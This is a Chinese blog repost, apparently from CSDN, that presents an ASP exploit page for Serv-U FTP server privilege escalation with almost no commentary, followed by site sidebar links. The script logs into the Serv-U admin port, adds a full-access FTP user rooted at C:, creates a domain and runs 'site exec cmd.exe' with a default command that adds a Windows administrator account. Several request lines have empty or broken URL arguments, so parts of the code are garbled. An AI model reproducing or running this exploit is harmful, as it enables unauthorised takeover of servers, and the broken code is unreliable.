serv-u最新通杀所有版本0day

最新推荐文章于 2020-11-27 19:31:31 发布
最新推荐文章于 2020-11-27 19:31:31 发布
阅读量728 收藏
点赞数
分类专栏: 漏洞收集 文章标签: button action border user table cmd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/7169073
版权

转载注明:http://hi.baidu.com/r00ts/blog/item/5c673305d801222ce92488c8.html?timeStamp=1318420470453

EXP:

 

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function
 
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then 
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”" 
End If
end Function
 
Function bytes2BSTR(vIn) 
strReturn = "" 
For i = 1 To LenB(vIn) 
ThisCharCode = AscB(MidB(vIn,i,1)) 
If ThisCharCode < &H80 Then 
strReturn = strReturn & Chr(ThisCharCode) 
Else 
NextCharCode = AscB(MidB(vIn,i+1,1)) 
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
i = i + 1 
End If 
Next 
bytes2BSTR = strReturn 
End Function 
%>
<%
    '----------自定义参数开始-----------
 
action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
organizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")
 
    '----------自定义参数结束-----------
 
select case action
 
case 1
   returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","","")
   sessionid=getmidstr("<sessionid>","</sessionid>",returns)
   if sessionid<>"" then
   Response.Write "login ok!"&"</br>"
   Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
   else
   Response.Write "error!"&"</br>"
   end if  
 
case 2
   call main2()
 
case 3
   returns=httpopen("","POST",")
   organizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
   organizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
   if organizationId<>"" then
   Response.write "get organizationId "&OrganizationId&" ok!"&"</br>"
   Response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId
                else
   Response.write "error!"&"</br>"
   end if
 
case 4
   call main3()
 
case 5
   returns=httpopen("","POST",")
   userid=getmidstr("<var name=""ObjectID"" val=""",""" />",returns)
   if userid<>"" then
   Response.write "get userid "&userid&" ok!"&"</br>"
   Response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId&"&userid="&userid
   else
   Response.write "error!"
   end if
 
case 6
   call main4()
 
case 7
   returns=httpopen("Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&","POST",")
   returns=httpopen("LoginID="&user&"&FullName=&Password="&pass&"&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2FC%3A&HomeDir=%2F"&path&"&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&AlwaysAllowLogin=1&Description=&=&IncludeRespCodesInMsgFiles=&ComboSignOnMessageFilePath=&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&","POST",")
   Response.write "add user ok!"&"</br>"
   Response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId
 
case 8
   call main5()
 
case 9
   returns=httpopen("DomainName="&mydomain&"&Description=test1&Enabled=1&EnableFTP=1&EnableFTPS=0&EnableSSH=0&EnableHTTP=0&EnableHTTPS=0&FTPPort="&ftpport&"&FTPSPort=990&SSHPort=22&HTTPPort=80&HTTPSPort=443&BindIPAddress=&","POST",")
   domainid=getmidstr("<ObjectID>","</ObjectID>",returns)
   Response.write "create domain ok!"&"</br>"
   Response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid
 
case 10
   call main6()
 
case 11
   set b=Server.CreateObject("Microsoft.XMLHTTP")
   b.open "GET", "", false, "", ""
   b.send "User " & user & vbCrLf & "pass "& pass & vbCrLf & "site exec c:\windows\system32\cmd.exe /c "& cmd & vbCrLf & "QUIT" & vbCrLf
   Response.Write Replace(b.responseText,chr(13),"<br>")
   Response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid
 
case 12
   call main7()
 
case 13
   returns=httpopen("IDs="&domainid&"&","POST",")
   Response.Write "临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂."&"</br>"
 
case else
   call main1()
 
end select
 
sub main1()
%>
<form id="form1" name="form1" method="post" action="?action=1">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第一步:获取sessionid</strong></td>
    </tr>
    <tr>
      <td align="right">管理端口:</td>
      <td><input name="port" type="text" id="port" value="43958" /></td>
    </tr>
    <tr>
      <td align="right">管理员密码:</td>
      <td><input name="loginpass" type="text" id="loginpass" value="1" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<p align=center><strong>一般情况下不用改,如果管理员改了的话就填上去.</strong></p>
<%
end sub
%>
<% sub main2() %>
 
<form id="form1" name="form1" method="post" action="?action=3&sessionid=<%=sessionid%>&port=<%=port%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第二步:获取OrganizationId</strong></td>
    </tr>
 
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<p align=center><strong>这一步有点慢,请等待.</strong></p>
 
<% end sub %>
<% sub main3() %>
 
<form id="form1" name="form1" method="post" action="?action=5&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第三步:获取userid</strong></td>
    </tr>
 
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
 
<% end sub %>
<% sub main4() %>
 
<form id="form1" name="form1" method="post" action="?action=7&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>&userid=<%=userid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第四步:加用户</strong></td>
    </tr>
    <tr>
      <td align="right">新ftp账号:</td>
      <td><input name="user" type="text" id="user" value="ash" /></td>
    </tr>
    <tr>
      <td align="right">新ftp密码:</td>
      <td><input name="pass" type="text" id="pass" value="hahaha" /></td>
    </tr>
    <tr>
      <td align="right">系统路径:</td>
      <td><input name="path" type="text" id="path" value="c:" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
 
<% end sub %>
<% sub main5() %>
 
<form id="form1" name="form1" method="post" action="?action=9&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第五步:创建域</strong></td>
    </tr>
    <tr>
      <td align="right">要添加的域:</td>
      <td><input name="mydomain" type="text" id="mydomain" value="testhack" /></td>
    </tr>
    <tr>
      <td align="right">域端口:</td>
      <td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
 
<% end sub %>
<% sub main6() %>
 
<form id="form1" name="form1" method="post" action="?action=11&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">
<table border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>执行命令</strong></td>
    </tr>
 
    <tr>
      <td align="right">FTP账号:</td>
      <td><input name="user" type="text" id="user" value="ash" /></td>
    </tr>
    <tr>
        <tr>
      <td align="right">FTP密码:</td>
      <td><input name="pass" type="text" id="pass" value="hahaha" /></td>
    </tr>
    <tr>
      <td align="right">FTP端口:</td>
      <td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
    </tr>
    <tr>
      <td align="right">你的语句:</td>
      <td><input name="cmd" type="text" id="cmd" value="net user admin admin123456 /add&net localgroup administrators admin /add" size="80" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
      </td>
    </tr>
</table>
</form>
<p align=center><strong>注意:如果是serv-u 7.0,这里可以马上点提交.</strong></p>
<p align=center><strong>注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交.</strong></p>
 
 
<% end sub %>
<% sub main7() %>
 
<form id="form1" name="form1" method="post" action="?action=13&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>删除临时域</strong></td>
    </tr>
 
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
 
<% end sub %>

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Serv-U的老版本
06-28
Serv-U的老版本,更好使用,新的版本似乎不怎么好用。自己存一个老版本
SERV-U 的配置文件详解
01-11
SERV-U的目录文件结构说明 Servudaemon.exe serv-u的服务程序,主文件 Servudaemon.ini serv-u的配置文件,记录用户信息,服务器参数 Seruadmin.exe serv-u管理界面 Servuadmin.ini serv-u管理界面配置文件 Servutray....
收集软件“serv-u”截止目前的所有版本_花瓣网经常维护,安利一个素材收集神器,可替代花瓣!...
weixin_39883705的博客
11-20 385
首先说明,这不是工具的广告贴,只是安利分享!近期花瓣网经常性维护,而且维护时间越来越长,越来越频繁!先不说我们去找其他灵感和素材,就连之前自己收藏的素材都看不到,这就有点坑了!今天给大家安利一个很不错的素材收集软件:Eagle(小编一直在用)。这个软件好处是什么呢?可本地存储,亦可云端存储(多端同步);查找素材方便(可按颜色、类别、关键字、标签等类别搜索查找);分类方便(标签、颜色等维度均可);支...
我们需要收集软件“serv-u”截止目前的所有版本。_梁宝川:出现新版本的anki,你要立刻更新吗?...
weixin_39825045的博客
11-09 470
每日写一篇文章的第2年189天anki考研找梁宝川事物是不断发展的,软件是不断迭代的。所有的软件都避免不了更新这个环节。尤其是一些发展态势比较好的软件。通过不断更新,给用户提供更优的服务体验。也在通过更新,消除一些bug。每一次的更新都会给一款软件带来一定程度的改变。有的是显性的,有的是隐性的。我对于软件的更新抱着一种积极的态度,尤其是大版本的更新。因为大版本的更新往往会带来一些非常便捷的功能。所...
serv-u 最新通杀所有版本 EXP
hacke2' Blog
02-02 1946
<!-- body,td,th { font-size: 12px; } --> <% Function httpopen(neirong,fangshi,dizhi,refer,cookie) set Http=server.createobject("Microsoft.XMLHTTP") Http.open fangshi,dizhi,false Http.setreq
Serv-U V15.2.1 多国语言版.zip
12-27
内含文件列表: SU-FTP-Server-Windows-v15.2.1.exe Serv-U 快速安装说明.pdf Serv-U典型应用配置.pdf 100%成功安装手册.txt
serv-U注册机破解licences
06-20
1. Serv-U软件注册机程序,亲测可用,支持官方下载的最新版本Serv-U 15.0.1.20多国语言安装程序 2. 使用方法:先安装Serv-U程序,安装成功后退出所有Serv-U相关的程序和服务,将注册机程序复制到Serv-U的安装目录...
Serv-U-精简版_serv-u_
10-03
可以做FPT服务器用来上传和下载文件,包括大文件,小文件,压缩文件,打包软件,安装包,联合包,开发包,网包,是个包,垃圾包。
serv-u建立ftp服务器实验报告.pdf
07-13
serv-u建立ftp服务器实验报告.pdfserv-u建立ftp服务器实验报告.pdfserv-u建立ftp服务器实验报告.pdfserv-u建立ftp服务器实验报告.pdfserv-u建立ftp服务器实验报告.pdfserv-u建立ftp服务器实验报告.pdf
Serv-U安装包及补丁
11-14
Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件!与Windows自带的FTP服务器不同的是:Serv-U同时支持主动和被动式FTP服务器搭建,更方便个人或小团队用户映射外网访问使用
Serv-u(MFT Server 15.1.2)
01-18
Serv-U是一款安全的FTP服务器软件,它提供了全面、安全、自动化和集中式的管理文件传输。无论您是应用于各种场合,Serv-U服务器都可以让您能快速、安全的进行文件传输和分享。 软件功能: 符合Windows 标准的用户界面友好亲切,易于掌握。 支持实时的多用户连接,支持匿名用户的访问; 通过限制同一时间最大的用户访问人数确保PC的正常运转。 安全性能出众。在目录和文件层次都可以设置安全防范措施。 能够为不同用户提供不同设置,支持分组管理数量众多的用户。 可以基于IP对用户授予或拒绝访问权限。 支持文件上传和下载过程中的断点续传。 支持拥有多个IP 地址的多宿主站点。 能够设置上传和下载的比率,硬盘空间配额,网络使用带宽等,从而能够保证用户有限的资源不被大量的FTP访问用户所消耗。 可作为系统服务后台运行。 可自用设置在用户登录或退出时的显示信息,支持具有UNIX 风格的外部链接。
Serv-U 6.4 ftp服务器经典怀旧版本
10-31
ftp服务器 经典怀旧 版本 ha_Serv-U6406 ServU6402
目前遇到最好用 ser-u服务器版本
11-11
目前遇到最好用 ser-u服务器版本 亲测能用 大家可以放心下载使用
Serv-U 绿色汉化 无限制序列号,无限制升级期限版本
01-25
Serv-U是一款由Rob Beckers开发的获奖的FTP服务器软件,它功能强大又易于使用。FTP服务器用户通过它用FTP协议能在internet上共享文件。Serv-U不仅100%遵从通用FTP标准,也包括众多的独特功能可为每个用户提供文件共享完美解决方案。非常好的FTP服务器软件,它设置简单,功能强大,性能稳定。你现在就可以建立你自己的FTP服务器了。 设置简单,但功能却不错。做个人的 FTP 服务器是很好的选择。它并不是简单地提供文件的下载,还为用户的系统安全提供了相当全面的保护。例如:您可以为您的 FTP 设置密码、设置各种用户级的访问许可等等
收集软件“serv-u”截止目前的所有版本_违法违规收集公民个人信息,386个APP服务单位被依法查处,包括小说、新闻、娱乐等多个类型...
weixin_39517199的博客
11-27 401
据公安部网络安全保卫局官方公众号消息,今年第一季度,全国公安机关网安部门充分发挥职能作用,加大公民个人信息保护力度,依法查处违法违规收集公民个人信息APP服务单位386个,涉及信息咨询、辅助学习、文学小说、新闻资讯、娱乐播报等多个类型。其中,97个APP服务单位被予以行政处罚,192个APP服务单位被依法责令改正违法行为,51个APP被下架、停运,有效保护了公民个人信息。突出典型案例为:1▊ “猎...
收集软件“serv-u”截止目前的所有版本_开源思维导图软件BlinkMindDesktop开放下载...
weixin_39631295的博客
11-12 188
BlinkMindDesktop是基于electron 和react开发的一款思维导图和大纲笔记App。目前在github上开放下载。暗色主题明亮主题大纲模式富文本编辑器BlinkMind的功能:BlinkMind与其他思维导图软件的主要优势BlinkMind的所有节点以及节点的备注都支持粘贴富文本进去,且不丢失样式,相对比于截图粘贴,可以使得思维导图的文件体积更小,且可以对富文本可以编辑。程序员...
serv-u 10.5.0.24
最新发布
01-20
serv-u 10.5.0.24是指该服务器上运行的serv-u版本为10.5.0.24。该版本可能是serv-u软件的某个特定版本,该版本的发布可能带来了一系列的改进和bug修复。 通过serv-u 10.5.0.24,用户可以搭建一个用于文件传输的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值